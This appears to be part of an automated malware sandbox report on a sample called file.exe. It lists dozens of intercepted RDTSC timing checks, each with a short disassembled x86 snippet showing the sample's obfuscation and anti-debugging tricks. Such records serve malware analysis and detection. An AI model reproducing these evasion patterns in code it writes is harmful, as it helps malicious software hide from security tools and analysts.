                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F089 second address: A8F0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1243F9F8h], ecx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F0BF9145128h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jne 00007F0BF914512Ch 0x0000003c mov eax, dword ptr [ebp+122D1539h] 0x00000042 mov dword ptr [ebp+122D264Ah], eax 0x00000048 push FFFFFFFFh 0x0000004a pushad 0x0000004b sub eax, dword ptr [ebp+122D1FBFh] 0x00000051 popad 0x00000052 nop 0x00000053 push ebx 0x00000054 js 00007F0BF914512Ch 0x0000005a pop ebx 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90F01 second address: A90F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F0FB second address: A8F115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91EF9 second address: A91F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D571h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A910C2 second address: A910C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93103 second address: A9310D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF8E3D56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920BA second address: A920C4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920C4 second address: A9219A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F0BF8E3D578h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F0BF8E3D568h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov dword ptr [ebp+122D1EF0h], ebx 0x0000003f mov eax, dword ptr [ebp+122D08EDh] 0x00000045 call 00007F0BF8E3D56Bh 0x0000004a call 00007F0BF8E3D56Dh 0x0000004f mov bx, si 0x00000052 pop ebx 0x00000053 pop ebx 0x00000054 mov di, bx 0x00000057 push FFFFFFFFh 0x00000059 jmp 00007F0BF8E3D572h 0x0000005e xor dword ptr [ebp+1244008Fh], edi 0x00000064 nop 0x00000065 jc 00007F0BF8E3D56Eh 0x0000006b push edx 0x0000006c jp 00007F0BF8E3D566h 0x00000072 pop edx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jmp 00007F0BF8E3D576h 0x0000007c jc 00007F0BF8E3D566h 0x00000082 popad 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9219A second address: A9219F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9512E second address: A95133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95133 second address: A95151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95151 second address: A95157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9566D second address: A95677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95677 second address: A95722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0BF8E3D568h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sbb ebx, 0B284F68h 0x0000002a push 00000000h 0x0000002c jng 00007F0BF8E3D56Ch 0x00000032 ja 00007F0BF8E3D566h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F0BF8E3D568h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 jmp 00007F0BF8E3D56Bh 0x00000059 push eax 0x0000005a pop ebx 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0BF8E3D573h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F0BF8E3D575h 0x0000006a jmp 00007F0BF8E3D571h 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966A4 second address: A966BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145133h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966BF second address: A966C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966C3 second address: A96702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F0BF9145128h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, 2D92h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b pop edi 0x0000002c xchg eax, esi 0x0000002d je 00007F0BF9145130h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96702 second address: A96727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0BF8E3D574h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F0BF8E3D566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A987DD second address: A987E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B944 second address: A9B94E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A7D9 second address: A9A7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A7DD second address: A9A7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FDEF second address: A9FE03 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F0BF9145126h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FE03 second address: A9FE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6303 second address: AA6309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6309 second address: AA631D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D570h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C29 second address: AA5C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BF914512Dh 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F0BF9145138h 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F0BF9145126h 0x0000001e jc 00007F0BF9145126h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C68 second address: AA5C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C6E second address: AA5C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF9145139h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C8B second address: AA5C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5DFD second address: AA5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E03 second address: AA5E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0BF8E3D566h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA1BE second address: AAA1C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA316 second address: AAA32D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0BF8E3D56Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA32D second address: AAA33D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA33D second address: AAA392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0BF8E3D575h 0x0000000b jmp 00007F0BF8E3D571h 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jnc 00007F0BF8E3D56Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0BF8E3D576h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA392 second address: AAA3BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0BF9145138h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA3BA second address: AAA3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1318 second address: AB131C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB131C second address: AB136A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D571h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0BF8E3D578h 0x00000011 jmp 00007F0BF8E3D572h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0BF8E3D56Ch 0x0000001e jmp 00007F0BF8E3D56Ah 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC5F second address: A3FC9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145139h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0BF914512Dh 0x00000012 jmp 00007F0BF914512Eh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0741 second address: AB0765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0BF8E3D57Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0765 second address: AB076B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB076B second address: AB0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D574h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1170 second address: AB1187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145133h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81095 second address: A81099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81099 second address: A810AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF914512Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810AF second address: A810B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810B3 second address: A8110F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0BF9145128h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12472E37h] 0x00000028 mov dword ptr [ebp+122D2D9Ch], edi 0x0000002e pushad 0x0000002f mov ax, 4B58h 0x00000033 movzx edx, ax 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007F0BF9145130h 0x0000003d push eax 0x0000003e jo 00007F0BF914512Eh 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8110F second address: A6AC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov dx, 73D4h 0x0000000a pushad 0x0000000b jns 00007F0BF8E3D566h 0x00000011 movzx edi, si 0x00000014 popad 0x00000015 call dword ptr [ebp+122D19A2h] 0x0000001b pushad 0x0000001c jmp 00007F0BF8E3D576h 0x00000021 push edx 0x00000022 jl 00007F0BF8E3D566h 0x00000028 jmp 00007F0BF8E3D576h 0x0000002d pop edx 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 jno 00007F0BF8E3D589h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81217 second address: A81226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8159A second address: A815A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81710 second address: A8171A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8171A second address: A81782 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF8E3D568h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 24C0C013h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0BF8E3D568h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3363h], edx 0x00000033 mov dword ptr [ebp+122D233Bh], ecx 0x00000039 call 00007F0BF8E3D569h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0BF8E3D579h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A818D5 second address: A818E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0BF9145126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A818E2 second address: A81962 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F0BF8E3D574h 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F0BF8E3D568h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d call 00007F0BF8E3D571h 0x00000032 mov dword ptr [ebp+122D1D2Ah], esi 0x00000038 pop ecx 0x00000039 jmp 00007F0BF8E3D572h 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 jmp 00007F0BF8E3D56Ch 0x00000047 pop ebx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FBA second address: A81FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FBE second address: A81FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F0BF8E3D566h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FD7 second address: A81FF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145137h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FF9 second address: A81FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FFE second address: A82004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822BD second address: A82301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, 68639F52h 0x00000014 lea eax, dword ptr [ebp+12472E37h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F0BF8E3D568h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov edx, esi 0x00000036 nop 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82301 second address: A82305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82305 second address: A82332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BF8E3D56Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CB7 second address: AB4CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F55 second address: AB4F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F5B second address: AB4F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0BF914512Eh 0x0000000e jmp 00007F0BF914512Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F7F second address: AB4F9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0BF8E3D578h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F9C second address: AB4FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB513D second address: AB5146 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5146 second address: AB514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB514C second address: AB5152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5152 second address: AB5174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0BF9145138h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5174 second address: AB517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB517A second address: AB5180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB52F3 second address: AB52F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB52F9 second address: AB5305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0BF9145126h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5492 second address: AB5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5496 second address: AB549C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
